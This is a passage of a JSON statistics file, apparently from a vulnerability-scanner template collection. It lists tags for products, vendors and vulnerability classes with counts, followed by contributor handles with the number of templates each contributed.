name":"pihole","count":1},{"name":"pieregister","count":1},{"name":"saml","count":1},{"name":"holidayapi","count":1},{"name":"phpfastcache","count":1},{"name":"majordomo2","count":1},{"name":"contentkeeper","count":1},{"name":"finereport","count":1},{"name":"workspace","count":1},{"name":"myanimelist","count":1},{"name":"smi","count":1},{"name":"haproxy","count":1},{"name":"zzzphp","count":1},{"name":"foss","count":1},{"name":"cerebro","count":1},{"name":"springframework","count":1},{"name":"placeos","count":1},{"name":"clustering","count":1},{"name":"drone","count":1},{"name":"jwt","count":1},{"name":"adfs","count":1},{"name":"primetek","count":1},{"name":"clearbit","count":1},{"name":"playable","count":1},{"name":"emby","count":1},{"name":"crestron","count":1},{"name":"mojoauth","count":1},{"name":"csrfguard","count":1},{"name":"cve2002","count":1},{"name":"edgemax","count":1},{"name":"etherscan","count":1},{"name":"eprints","count":1},{"name":"ssltls","count":1},{"name":"caseaware","count":1},{"name":"urlscan","count":1},{"name":"zenario","count":1},{"name":"dixell","count":1},{"name":"iserver","count":1},{"name":"pippoint","count":1},{"name":"rmc","count":1},{"name":"esxi","count":1},{"name":"h5sconsole","count":1},{"name":"console","count":1},{"name":"pinata","count":1},{"name":"vision","count":1},{"name":"polarisft","count":1},{"name":"zoomsounds","count":1},{"name":"hdnetwork","count":1},{"name":"ecosys","count":1},{"name":"apiman","count":1},{"name":"commscope","count":1},{"name":"f5","count":1},{"name":"weiphp","count":1},{"name":"oki","count":1},{"name":"upnp","count":1},{"name":"cobub","count":1},{"name":"xampp","count":1},{"name":"gsm","count":1},{"name":"eyoumail","count":1},{"name":"parentlink","count":1},{"name":"webeditors","count":1},{"name":"virustotal","count":1},{"name":"nexusdb","count":1},{"name":"whm","count":1},{"name":"wavemaker","count":1},{"name":"ixbusweb","count":1},{"name":"contactform","count":1},{"name":"office365","count":1},{"name":"clockwork","count":1},{"name":"pan","count":1},{"name":"elevation","count":1},{"name":"submitty","count":1},{"name":"workresources","count":1},{"name":"caddy","count":1},{"name":"javafaces","count":1},{"name":"shoretel","count":1},{"name":"biqsdrive","count":1},{"name":"skywalking","count":1},{"name":"pollbot","count":1},{"name":"php-fusion","count":1},{"name":"pods","count":1},{"name":"gnuboard","count":1},{"name":"diris","count":1},{"name":"nps","count":1},{"name":"short.io","count":1},{"name":"timezone","count":1},{"name":"emerson","count":1},{"name":"idera","count":1},{"name":"supervisor","count":1},{"name":"webui","count":1},{"name":"zuul","count":1},{"name":"anchorcms","count":1},{"name":"eyelock","count":1},{"name":"express","count":1},{"name":"kodi","count":1},{"name":"objectinjection","count":1},{"name":"totaljs","count":1},{"name":"accent","count":1},{"name":"lancom","count":1},{"name":"stridercd","count":1},{"name":"fastapi","count":1},{"name":"stackstorm","count":1},{"name":"zmanda","count":1},{"name":"spectracom","count":1},{"name":"yaws","count":1},{"name":"tugboat","count":1},{"name":"meraki","count":1},{"name":"txt","count":1},{"name":"open-redirect","count":1},{"name":"neo4j","count":1},{"name":"leanix","count":1},{"name":"goanywhere","count":1},{"name":"blueiris","count":1},{"name":"sterling","count":1},{"name":"shoppable","count":1},{"name":"adb","count":1},{"name":"richfaces","count":1},{"name":"pirelli","count":1},{"name":"meshcentral","count":1},{"name":"clink-office","count":1},{"name":"yealink","count":1},{"name":"grails","count":1},{"name":"eyesofnetwork","count":1},{"name":"vsftpd","count":1},{"name":"deviantart","count":1},{"name":"mantis","count":1},{"name":"securityspy","count":1},{"name":"aura","count":1},{"name":"remkon","count":1},{"name":"zoneminder","count":1},{"name":"mongo-express","count":1},{"name":"ocs-inventory","count":1},{"name":"myvuehelp","count":1},{"name":"interactsh","count":1},{"name":"web3storage","count":1},{"name":"distance","count":1},{"name":"ns","count":1},{"name":"smartblog","count":1},{"name":"spotify","count":1},{"name":"csod","count":1},{"name":"concourse","count":1},{"name":"google-earth","count":1},{"name":"beanstalk","count":1},{"name":"tplink","count":1},{"name":"apple","count":1},{"name":"buddy","count":1},{"name":"nimble","count":1},{"name":"jenzabar","count":1},{"name":"threatq","count":1},{"name":"rubedo","count":1},{"name":"hiawatha","count":1},{"name":"covalent","count":1},{"name":"qvisdvr","count":1},{"name":"graphiql","count":1},{"name":"micro-user-service","count":1},{"name":"strava","count":1},{"name":"lg-nas","count":1},{"name":"tekon","count":1},{"name":"discord","count":1},{"name":"visualstudio","count":1},{"name":"kvm","count":1},{"name":"hirak","count":1},{"name":"shadoweb","count":1},{"name":"zcms","count":1},{"name":"twitter-server","count":1},{"name":"wiki","count":1},{"name":"prismaweb","count":1},{"name":"asana","count":1},{"name":"pagerduty","count":1},{"name":"petfinder","count":1},{"name":"fms","count":1},{"name":"suprema","count":1},{"name":"gerapy","count":1},{"name":"clave","count":1},{"name":"abuseipdb","count":1},{"name":"etcd","count":1},{"name":"groupoffice","count":1},{"name":"powercreator","count":1},{"name":"h3c-imc","count":1},{"name":"nomad","count":1},{"name":"spip","count":1},{"name":"timesheet","count":1},{"name":"netmask","count":1},{"name":"dvdFab","count":1},{"name":"aspnuke","count":1},{"name":"wallix","count":1},{"name":"server","count":1},{"name":"helpdesk","count":1},{"name":"sunflower","count":1},{"name":"nearby","count":1},{"name":"visualtools","count":1},{"name":"gunicorn","count":1},{"name":"landrayoa","count":1},{"name":"kodexplorer","count":1},{"name":"karma","count":1},{"name":"dom","count":1},{"name":"labtech","count":1},{"name":"mastodon","count":1},{"name":"exponentcms","count":1},{"name":"maxsite","count":1},{"name":"glowroot","count":1},{"name":"festivo","count":1},{"name":"thinkserver","count":1},{"name":"ulterius","count":1},{"name":"graylog","count":1},{"name":"icinga","count":1},{"name":"bitrise","count":1},{"name":"processwire","count":1},{"name":"wix","count":1},{"name":"cron","count":1},{"name":"ddownload","count":1},{"name":"openx","count":1},{"name":"mirasys","count":1},{"name":"luftguitar","count":1},{"name":"revslider","count":1},{"name":"sitefinity","count":1},{"name":"place","count":1},{"name":"concrete5","count":1},{"name":"spiderfoot","count":1},{"name":"nc2","count":1},{"name":"openerp","count":1},{"name":"fhem","count":1},{"name":"acme","count":1},{"name":"calendarific","count":1},{"name":"cliniccases","count":1},{"name":"aniapi","count":1},{"name":"gcp","count":1},{"name":"nweb2fax","count":1},{"name":"erp-nc","count":1},{"name":"pypicloud","count":1},{"name":"ruoyi","count":1},{"name":"tinypng","count":1},{"name":"hrsale","count":1},{"name":"getgrav","count":1},{"name":"thinkadmin","count":1},{"name":"owa","count":1},{"name":"travis","count":1},{"name":"plone","count":1},{"name":"sprintful","count":1},{"name":"apigee","count":1},{"name":"accuweather","count":1},{"name":"tink","count":1},{"name":"admidio","count":1},{"name":"vanguard","count":1},{"name":"oidc","count":1},{"name":"timeclock","count":1},{"name":"svn","count":1},{"name":"coinlayer","count":1},{"name":"geocode","count":1},{"name":"alchemy","count":1},{"name":"cors","count":1},{"name":"unifi","count":1},{"name":"comodo","count":1},{"name":"axiom","count":1},{"name":"kerio","count":1},{"name":"trilithic","count":1},{"name":"ganglia","count":1},{"name":"sast","count":1},{"name":"jinfornet","count":1},{"name":"xml","count":1},{"name":"processmaker","count":1},{"name":"darkstat","count":1},{"name":"shopxo","count":1},{"name":"jupyterhub","count":1},{"name":"avatier","count":1},{"name":"xvr","count":1},{"name":"comfortel","count":1},{"name":"whmcs","count":1},{"name":"clockwatch","count":1},{"name":"jaspersoft","count":1},{"name":"siebel","count":1},{"name":"knowage","count":1},{"name":"yarn","count":1},{"name":"mdm","count":1},{"name":"jeecg-boot","count":1},{"name":"billquick","count":1},{"name":"nownodes","count":1},{"name":"xdcms","count":1},{"name":"jsp","count":1},{"name":"wavlink","count":1},{"name":"ipvpn","count":1},{"name":"caa","count":1},{"name":"roundcube","count":1},{"name":"opnsense","count":1},{"name":"perl","count":1},{"name":"eventtickets","count":1},{"name":"kindeditor","count":1},{"name":"domino","count":1},{"name":"limit","count":1},{"name":"zookeeper","count":1},{"name":"redcap","count":1},{"name":"eg","count":1},{"name":"markdown","count":1},{"name":"gstorage","count":1},{"name":"thedogapi","count":1},{"name":"hanwang","count":1},{"name":"rudloff","count":1},{"name":"fortressaircraft","count":1},{"name":"seopanel","count":1},{"name":"mara","count":1},{"name":"dwsync","count":1},{"name":"daybyday","count":1},{"name":"fanwei","count":1},{"name":"books","count":1},{"name":"gocron","count":1},{"name":"opm","count":1},{"name":"malshare","count":1},{"name":"kyan","count":1},{"name":"youtube","count":1},{"name":"biostar2","count":1},{"name":"viaware","count":1},{"name":"duomicms","count":1},{"name":"oliver","count":1},{"name":"quantum","count":1},{"name":"zend","count":1},{"name":"gofile","count":1},{"name":"gemweb","count":1},{"name":"aerohive","count":1},{"name":"cassandra","count":1},{"name":"moinmoin","count":1},{"name":"minimouse","count":1},{"name":"routeros","count":1},{"name":"expn","count":1},{"name":"nuxeo","count":1},{"name":"tracer","count":1},{"name":"salesforce","count":1},{"name":"dolphinscheduler","count":1},{"name":"xiuno","count":1},{"name":"xmpp","count":1},{"name":"binance","count":1},{"name":"bible","count":1},{"name":"xunchi","count":1},{"name":"announcekit","count":1},{"name":"asus","count":1},{"name":"satellian","count":1},{"name":"monitorr","count":1},{"name":"block","count":1},{"name":"kronos","count":1},{"name":"opensso","count":1},{"name":"geddy","count":1},{"name":"imap","count":1},{"name":"chinaunicom","count":1},{"name":"microcomputers","count":1},{"name":"svnserve","count":1},{"name":"restler","count":1},{"name":"phpunit","count":1},{"name":"malwarebazaar","count":1},{"name":"planon","count":1},{"name":"hiboss","count":1},{"name":"adiscon","count":1},{"name":"bookstack","count":1},{"name":"pulsesecure","count":1},{"name":"find","count":1},{"name":"mailboxvalidator","count":1},{"name":"dvr","count":1},{"name":"fatwire","count":1},{"name":"sso","count":1},{"name":"chronoforums","count":1},{"name":"sucuri","count":1},{"name":"apos","count":1},{"name":"ebird","count":1},{"name":"shiro","count":1},{"name":"blackboard","count":1},{"name":"jabber","count":1},{"name":"dokuwiki","count":1},{"name":"instatus","count":1},{"name":"ewebs","count":1},{"name":"avalanche","count":1},{"name":"karel","count":1},{"name":"tjws","count":1},{"name":"cvnd2018","count":1},{"name":"extreme","count":1},{"name":"oneblog","count":1},{"name":"scanii","count":1},{"name":"cybrotech","count":1},{"name":"rwebserver","count":1},{"name":"cve2021wordpress","count":1},{"name":"74cms","count":1},{"name":"tieline","count":1},{"name":"esmtp","count":1},{"name":"projector","count":1},{"name":"b2bbuilder","count":1},{"name":"pyspider","count":1},{"name":"optiLink","count":1},{"name":"magicflow","count":1},{"name":"musicstore","count":1},{"name":"simplecrm","count":1},{"name":"froxlor","count":1},{"name":"faust","count":1},{"name":"calendarix","count":1},{"name":"elementor","count":1},{"name":"lutron","count":1},{"name":"natemail","count":1},{"name":"appveyor","count":1},{"name":"dreamweaver","count":1},{"name":"livezilla","count":1},{"name":"casemanager","count":1},{"name":"h2","count":1},{"name":"europeana","count":1},{"name":"wago","count":1},{"name":"jreport","count":1},{"name":"sassy","count":1},{"name":"secnet-ac","count":1},{"name":"scimono","count":1},{"name":"tamronos","count":1},{"name":"racksnet","count":1},{"name":"opengear","count":1},{"name":"h5s","count":1},{"name":"webex","count":1},{"name":"harvardart","count":1},{"name":"crm","count":1},{"name":"securenvoy","count":1},{"name":"lanproxy","count":1},{"name":"octobercms","count":1},{"name":"containers","count":1},{"name":"superwebmailer","count":1},{"name":"coinranking","count":1},{"name":"droneci","count":1},{"name":"gloo","count":1},{"name":"email","count":1},{"name":"sonarcloud","count":1},{"name":"dribbble","count":1},{"name":"buttercms","count":1},{"name":"shopizer","count":1},{"name":"dss","count":1},{"name":"softaculous","count":1},{"name":"feifeicms","count":1},{"name":"websvn","count":1},{"name":"emc","count":1},{"name":"memcached","count":1},{"name":"dericam","count":1},{"name":"clickhouse","count":1},{"name":"directum","count":1},{"name":"qualcomm","count":1},{"name":"jeewms","count":1},{"name":"cofax","count":1},{"name":"pendo","count":1},{"name":"veeam","count":1},{"name":"portainer","count":1},{"name":"soar","count":1},{"name":"loqate","count":1},{"name":"rujjie","count":1},{"name":"dahua","count":1},{"name":"struts2","count":1},{"name":"rainloop","count":1},{"name":"mofi","count":1},{"name":"overflow","count":1},{"name":"cve2004","count":1},{"name":"b2evolution","count":1},{"name":"totolink","count":1},{"name":"wifisky","count":1},{"name":"nerdgraph","count":1},{"name":"wordcloud","count":1},{"name":"scs","count":1},{"name":"ecshop","count":1},{"name":"shortcode","count":1},{"name":"tectuus","count":1},{"name":"nette","count":1},{"name":"smartsense","count":1},{"name":"easyappointments","count":1},{"name":"cscart","count":1},{"name":"doh","count":1},{"name":"expressjs","count":1},{"name":"sauter","count":1},{"name":"chevereto","count":1},{"name":"gurock","count":1},{"name":"fortilogger","count":1},{"name":"olivetti","count":1},{"name":"ncomputing","count":1},{"name":"openresty","count":1},{"name":"appweb","count":1},{"name":"mongoshake","count":1},{"name":"eyou","count":1},{"name":"slocum","count":1},{"name":"sceditor","count":1},{"name":"openweather","count":1},{"name":"particle","count":1},{"name":"fontawesome","count":1},{"name":"addpac","count":1},{"name":"taiga","count":1},{"name":"basic-auth","count":1},{"name":"details","count":1},{"name":"weglot","count":1},{"name":"teradici","count":1},{"name":"wmt","count":1},{"name":"default","count":1},{"name":"webmodule-ee","count":1},{"name":"phalcon","count":1},{"name":"alquist","count":1},{"name":"pmb","count":1},{"name":"cherokee","count":1},{"name":"piluscart","count":1},{"name":"ignition","count":1},{"name":"jenkin","count":1},{"name":"livehelperchat","count":1},{"name":"iframe","count":1},{"name":"omi","count":1},{"name":"phpfusion","count":1},{"name":"dwr","count":1},{"name":"activeadmin","count":1},{"name":"netrc","count":1},{"name":"mtheme","count":1},{"name":"amcrest","count":1},{"name":"browserless","count":1},{"name":"u8","count":1},{"name":"zeppelin","count":1},{"name":"zipkin","count":1},{"name":"piwigo","count":1},{"name":"varnish","count":1},{"name":"idor","count":1},{"name":"antsword","count":1},{"name":"cse","count":1},{"name":"spinnaker","count":1},{"name":"fcm","count":1},{"name":"adoptapet","count":1},{"name":"hortonworks","count":1},{"name":"mariadb","count":1},{"name":"cucm","count":1},{"name":"zm","count":1},{"name":"xproxy","count":1},{"name":"checkmarx","count":1},{"name":"admin","count":1},{"name":"zarafa","count":1},{"name":"semaphore","count":1},{"name":"argocd","count":1},{"name":"edgeos","count":1},{"name":"tuxedo","count":1},{"name":"sgp","count":1},{"name":"huijietong","count":1},{"name":"guppy","count":1},{"name":"mappress","count":1},{"name":"bullwark","count":1},{"name":"camunda","count":1},{"name":"identityguard","count":1},{"name":"xoops","count":1},{"name":"ixcache","count":1},{"name":"idemia","count":1},{"name":"szhe","count":1},{"name":"xds","count":1},{"name":"fiori","count":1},{"name":"klog","count":1},{"name":"sponip","count":1},{"name":"mrtg","count":1},{"name":"abbott","count":1},{"name":"okiko","count":1},{"name":"oauth2","count":1},{"name":"ldap","count":1},{"name":"bash","count":1},{"name":"beanshell","count":1},{"name":"mdb","count":1},{"name":"epm","count":1},{"name":"couchcms","count":1},{"name":"route","count":1},{"name":"redwood","count":1},{"name":"sco","count":1},{"name":"bonita","count":1},{"name":"twig","count":1},{"name":"iceflow","count":1},{"name":"razor","count":1},{"name":"leostream","count":1},{"name":"pagespeed","count":1},{"name":"axxonsoft","count":1},{"name":"netgenie","count":1},{"name":"directadmin","count":1},{"name":"formalms","count":1},{"name":"dotnet","count":1},{"name":"sourcecodester","count":1},{"name":"tufin","count":1},{"name":"jinher","count":1},{"name":"mapbox","count":1},{"name":"gateway","count":1},{"name":"manager","count":1},{"name":"delta","count":1},{"name":"loytec","count":1},{"name":"acontent","count":1},{"name":"portal","count":1},{"name":"AlphaWeb","count":1},{"name":"formcraft3","count":1},{"name":"jumpcloud","count":1},{"name":"ptr","count":1},{"name":"siemens","count":1},{"name":"alerta","count":1},{"name":"feedwordpress","count":1},{"name":"etherpad","count":1},{"name":"bing","count":1},{"name":"gilacms","count":1},{"name":"nsasg","count":1},{"name":"abstractapi","count":1},{"name":"mozilla","count":1},{"name":"dicoogle","count":1},{"name":"qizhi","count":1},{"name":"yachtcontrol","count":1},{"name":"saltapi","count":1},{"name":"floc","count":1},{"name":"raspap","count":1},{"name":"st","count":1},{"name":"bazarr","count":1},{"name":"logontracer","count":1},{"name":"secret","count":1},{"name":"web-dispatcher","count":1},{"name":"socomec","count":1},{"name":"robomongo","count":1},{"name":"expose","count":1},{"name":"cve2000","count":1},{"name":"babel","count":1},{"name":"lacie","count":1},{"name":"aims","count":1},{"name":"emessage","count":1},{"name":"phpwiki","count":1},{"name":"yzmcms","count":1},{"name":"smuggling","count":1},{"name":"newsletter","count":1},{"name":"novnc","count":1},{"name":"landray","count":1},{"name":"bigfix","count":1},{"name":"rmi","count":1},{"name":"iconfinder","count":1},{"name":"webctrl","count":1},{"name":"apcu","count":1},{"name":"tianqing","count":1},{"name":"kerbynet","count":1},{"name":"ssi","count":1},{"name":"webftp","count":1},{"name":"clansphere","count":1},{"name":"wildfly","count":1},{"name":"htmli","count":1},{"name":"eyoucms","count":1},{"name":"goip","count":1},{"name":"qsan","count":1},{"name":"wakatime","count":1},{"name":"tarantella","count":1},{"name":"calendly","count":1},{"name":"smartsheet","count":1},{"name":"sage","count":1},{"name":"centreon","count":1},{"name":"radius","count":1},{"name":"incapptic-connect","count":1},{"name":"atvise","count":1},{"name":"rsa","count":1},{"name":"cname","count":1},{"name":"strider","count":1},{"name":"codemeter","count":1},{"name":"trello","count":1},{"name":"honeypot","count":1},{"name":"achecker","count":1},{"name":"thecatapi","count":1},{"name":"blockfrost","count":1},{"name":"zentral","count":1},{"name":"opensmtpd","count":1},{"name":"activecollab","count":1},{"name":"biometrics","count":1},{"name":"pivotaltracker","count":1},{"name":"kenesto","count":1},{"name":"cgit","count":1},{"name":"realteo","count":1},{"name":"lionwiki","count":1},{"name":"onkyo","count":1},{"name":"paneil","count":1},{"name":"qdpm","count":1},{"name":"fortigates","count":1},{"name":"ipstack","count":1},{"name":"streetview","count":1},{"name":"mx","count":1},{"name":"etouch","count":1},{"name":"librenms","count":1},{"name":"api-manager","count":1},{"name":"ucp","count":1},{"name":"nutanix","count":1},{"name":"commvault","count":1},{"name":"weboftrust","count":1},{"name":"nifi","count":1},{"name":"werkzeug","count":1},{"name":"emlog","count":1},{"name":"csa","count":1},{"name":"ricoh","count":1},{"name":"speed","count":1},{"name":"acexy","count":1},{"name":"unisharp","count":1},{"name":"orbintelligence","count":1},{"name":"bitquery","count":1},{"name":"rijksmuseum","count":1},{"name":"xamr","count":1},{"name":"defectdojo","count":1},{"name":"solman","count":1},{"name":"adminset","count":1},{"name":"flowci","count":1},{"name":"charity","count":1},{"name":"dbeaver","count":1},{"name":"vercel","count":1},{"name":"ncbi","count":1},{"name":"lfw","count":1},{"name":"dompdf","count":1},{"name":"hue","count":1},{"name":"boa","count":1},{"name":"hanming","count":1},{"name":"redhat","count":1},{"name":"primefaces","count":1},{"name":"micro","count":1},{"name":"intellislot","count":1},{"name":"hetzner","count":1},{"name":"sar2html","count":1},{"name":"kramer","count":1},{"name":"ecom","count":1},{"name":"flexbe","count":1},{"name":"bitcoinaverage","count":1},{"name":"web-suite","count":1},{"name":"opencart","count":1},{"name":"secnet","count":1},{"name":"buildbot","count":1},{"name":"spidercontrol","count":1},{"name":"vnc","count":1},{"name":"wondercms","count":1},{"name":"testrail","count":1},{"name":"lumis","count":1},{"name":"opensns","count":1},{"name":"improvmx","count":1},{"name":"lokalise","count":1},{"name":"adafruit","count":1},{"name":"xmlchart","count":1},{"name":"vsphere","count":1},{"name":"opencast","count":1},{"name":"sureline","count":1},{"name":"netweaver","count":1},{"name":"oscommerce","count":1},{"name":"asanhamayesh","count":1},{"name":"spf","count":1},{"name":"flask","count":1},{"name":"inspur","count":1},{"name":"iterable","count":1},{"name":"optimizely","count":1},{"name":"fastcgi","count":1},{"name":"rhymix","count":1},{"name":"geutebruck","count":1},{"name":"mautic","count":1},{"name":"maccmsv10","count":1},{"name":"plc","count":1},{"name":"instagram","count":1},{"name":"bravenewcoin","count":1},{"name":"mediumish","count":1},{"name":"nedi","count":1},{"name":"barco","count":1},{"name":"connect-central","count":1},{"name":"interlib","count":1},{"name":"rdp","count":1},{"name":"bolt","count":1},{"name":"shindig","count":1},{"name":"postmark","count":1},{"name":"ioncube","count":1},{"name":"burp","count":1},{"name":"stytch","count":1},{"name":"sarg","count":1},{"name":"oam","count":1},{"name":"jnoj","count":1},{"name":"gridx","count":1},{"name":"box","count":1},{"name":"vms","count":1},{"name":"keenetic","count":1},{"name":"coinmarketcap","count":1},{"name":"webalizer","count":1},{"name":"rsyncd","count":1},{"name":"cloudera","count":1},{"name":"episerver","count":1},{"name":"shopware","count":1},{"name":"acsoft","count":1},{"name":"superset","count":1},{"name":"acemanager","count":1},{"name":"postgres","count":1},{"name":"myucms","count":1},{"name":"phoronix","count":1},{"name":"wing-ftp","count":1},{"name":"wdja","count":1},{"name":"allied","count":1},{"name":"kubeflow","count":1},{"name":"snipeit","count":1},{"name":"telecom","count":1},{"name":"iucn","count":1},{"name":"fastly","count":1},{"name":"kyocera","count":1},{"name":"extractor","count":1},{"name":"osquery","count":1},{"name":"teltonika","count":1},{"name":"coinapi","count":1},{"name":"siteomat","count":1},{"name":"ntopng","count":1},{"name":"starttls","count":1},{"name":"pastebin","count":1}],"authors":[{"name":"daffainfo","count":560},{"name":"dhiyaneshdk","count":421},{"name":"pikpikcu","count":316},{"name":"pdteam","count":262},{"name":"geeknik","count":178},{"name":"dwisiswant0","count":167},{"name":"princechaddha","count":130},{"name":"0x_akoko","count":128},{"name":"gy741","count":117},{"name":"pussycat0x","count":116},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"idealphase","count":46},{"name":"gaurang","count":42},{"name":"philippedelteil","count":36},{"name":"ritikchaddha","count":35},{"name":"adam crosser","count":30},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"c-sh0","count":23},{"name":"ffffffff0x","count":22},{"name":"righettod","count":18},{"name":"cckuailong","count":17},{"name":"akincibor","count":16},{"name":"pr3r00t","count":15},{"name":"for3stco1d","count":15},{"name":"sheikhrishad","count":15},{"name":"techbrunchfr","count":14},{"name":"milo2012","count":14},{"name":"r3dg33k","count":14},{"name":"sharath","count":13},{"name":"sullo","count":12},{"name":"suman_kar","count":12},{"name":"melbadry9","count":11},{"name":"cyllective","count":11},{"name":"wdahlenb","count":11},{"name":"random_robbie","count":10},{"name":"meme-lord","count":10},{"name":"alph4byt3","count":10},{"name":"johnk3r","count":10},{"name":"nadino","count":10},{"name":"hackergautam","count":10},{"name":"dogasantos","count":9},{"name":"emadshanab","count":9},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"zh","count":8},{"name":"iamthefrogy","count":8},{"name":"randomstr1ng","count":7},{"name":"edoardottt","count":7},{"name":"random-robbie","count":7},{"name":"logicalhunter","count":7},{"name":"kophjager007","count":7},{"name":"techryptic (@tech)","count":7},{"name":"oppsec","count":7},{"name":"harshbothra_","count":7},{"name":"0x240x23elu","count":7},{"name":"divya_mudgal","count":7},{"name":"dr_set","count":7},{"name":"caspergn","count":6},{"name":"puzzlepeaches","count":6},{"name":"forgedhallpass","count":6},{"name":"evan rubinstein","count":6},{"name":"pentest_swissky","count":6},{"name":"iamnoooob","count":6},{"name":"leovalcante","count":6},{"name":"__fazal","count":6},{"name":"pathtaga","count":6},{"name":"rootxharsh","count":6},{"name":"panch0r3d","count":5},{"name":"elsfa7110","count":5},{"name":"lu4nx","count":5},{"name":"_0xf4n9x_","count":5},{"name":"ganofins","count":5},{"name":"podalirius","count":5},{"name":"imnightmaree","count":5},{"name":"yanyun","count":5},{"name":"praetorian-thendrickson","count":5},{"name":"xelkomy","count":5},{"name":"joanbono","count":5},{"name":"tanq16","count":4},{"name":"wisnupramoedya","count":4},{"name":"dadevel","count":4},{"name":"defr0ggy","count":4},{"name":"incogbyte","count":4},{"name":"e_schultze_","count":4},{"name":"dolev farhi","count":4},{"name":"nodauf","count":4},{"name":"tess","count":4},{"name":"lark-lab","count":3},{"name":"impramodsargar","count":3},{"name":"davidmckennirey","count":3},{"name":"h1ei1","count":3},{"name":"shine","count":3},{"name":"shifacyclewala","count":3},{"name":"mr-xn","count":3},{"name":"fyoorer","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"dudez","count":3},{"name":"_generic_human_","count":3},{"name":"sushantkamble","count":3},{"name":"unstabl3","count":3},{"name":"skeltavik","count":3},{"name":"f1tz","count":3},{"name":"r3naissance","count":3},{"name":"jarijaas","count":3},{"name":"me9187","count":3},{"name":"z3bd","count":3},{"name":"0w4ys","count":3},{"name":"arcc","count":3},{"name":"mavericknerd","count":3},{"name":"github.com/its0x08","count":3},{"name":"thomas_from_offensity","count":3},{"name":"gitlab red team","count":3},{"name":"andydoering","count":3},{"name":"johnjhacking","count":3},{"name":"binaryfigments","count":3},{"name":"supras","count":3},{"name":"alifathi-h1","count":3},{"name":"whoever","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"emenalf","count":3},{"name":"vsh00t","count":2},{"name":"zomsop82","count":2},{"name":"redteambrasil","count":2},{"name":"raesene","count":2},{"name":"bsysop","count":2},{"name":"kre80r","count":2},{"name":"bernardofsr","count":2},{"name":"0xsapra","count":2},{"name":"nuk3s3c","count":2},{"name":"0xrudra","count":2},{"name":"y4er","count":2},{"name":"convisoappsec","count":2},{"name":"paradessia","count":2},{"name":"danielmofer","count":2},{"name":"geekby","count":2},{"name":"z0ne","count":2},{"name":"luci","count":2},{"name":"manas_harsh","count":2},{"name":"hahwul","count":2},{"name":"splint3r7","count":2},{"name":"gevakun","count":2},{"name":"k11h-de","count":2},{"name":"randomrobbie","count":2},{"name":"afaq","count":2},{"name":"0xelkomy","count":2},{"name":"dahse89","count":2},{"name":"kiblyn11","count":2},{"name":"r12w4n","count":2},{"name":"ehsahil","count":2},{"name":"cocxanh","count":2},{"name":"vavkamil","count":2},{"name":"thardt-praetorian","count":2},{"name":"bing0o","count":2},{"name":"bp0lr","count":2},{"name":"ambassify","count":2},{"name":"hackerarpan","count":2},{"name":"0xcrypto","count":2},{"name":"joeldeleep","count":2},{"name":"udit_thakkur","count":2},{"name":"martincodes-de","count":2},{"name":"nvn1729","count":2},{"name":"x1m_martijn","count":2},{"name":"its0x08","count":2},{"name":"paperpen","count":2},{"name":"fabaff","count":2},{"name":"amsda","count":2},{"name":"koti2","count":2},{"name":"0xprial","count":2},{"name":"gal nagli","count":2},{"name":"dheerajmadhukar","count":2},{"name":"bananabr","count":2},{"name":"lotusdll","count":2},{"name":"sy3omda","count":2},{"name":"smaranchand","count":2},{"name":"huowuzhao","count":2},{"name":"hetroublemakr","count":2},{"name":"hassan khan yusufzai - splint3r7","count":2},{"name":"g4l1t0","count":2},{"name":"rafaelwdornelas","count":2},{"name":"ajaysenr","count":2},{"name":"parth","count":2},{"name":"cckuakilong","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"socketz","count":2},{"name":"foulenzer","count":2},{"name":"w4cky_","count":2},{"name":"mohammedsaneem","count":2},{"name":"sbani","count":2},{"name":"ree4pwn","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"taielab","count":2},{"name":"moritz nentwig","count":2},{"name":"nkxxkn","count":2},{"name":"0xsmiley","count":2},{"name":"swissky","count":2},{"name":"pxmme1337","count":2},{"name":"ofjaaah","count":1},{"name":"oscarintherocks","count":1},{"name":"husain","count":1},{"name":"yashanand155","count":1},{"name":"ahmed sherif","count":1},{"name":"bad5ect0r","count":1},{"name":"lethargynavigator","count":1},{"name":"droberson","count":1},{"name":"kabirsuda","count":1},{"name":"flag007","count":1},{"name":"sshell","count":1},{"name":"_harleo","count":1},{"name":"bartu utku sarp","count":1},{"name":"orpheus","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"xeldax","count":1},{"name":"ahmetpergamum","count":1},{"name":"affix","count":1},{"name":"exceed","count":1},{"name":"deena","count":1},{"name":"tea","count":1},{"name":"chron0x","count":1},{"name":"elder tao","count":1},{"name":"push4d","count":1},{"name":"tirtha_mandal","count":1},{"name":"c3l3si4n","count":1},{"name":"ooooooo_q","count":1},{"name":"akshansh","count":1},{"name":"akash.c","count":1},{"name":"notnotnotveg","count":1},{"name":"hexcat","count":1},{"name":"hakluke","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"clarkvoss","count":1},{"name":"sherlocksecurity","count":1},{"name":"osamahamad","count":1},{"name":"soyelmago","count":1},{"name":"adrianmf","count":1},{"name":"mubassirpatel","count":1},{"name":"th3.d1p4k","count":1},{"name":"majidmc2","count":1},{"name":"ipanda","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"alex","count":1},{"name":"charanrayudu","count":1},{"name":"revblock","count":1},{"name":"v0idc0de","count":1},{"name":"cookiehanhoan","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"wabafet","count":1},{"name":"juicypotato1","count":1},{"name":"nielsing","count":1},{"name":"knassar702","count":1},{"name":"ahmed abou-ela","count":1},{"name":"jeya.seelan","count":1},{"name":"lark lab","count":1},{"name":"p-l-","count":1},{"name":"zhenwarx","count":1},{"name":"philippdelteil","count":1},{"name":"yuansec","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"momen eldawakhly","count":1},{"name":"noamrathaus","count":1},{"name":"x6263","count":1},{"name":"tirtha","count":1},{"name":"makyotox","count":1},{"name":"remonsec","count":1},{"name":"noobexploiter","count":1},{"name":"kishore krishna 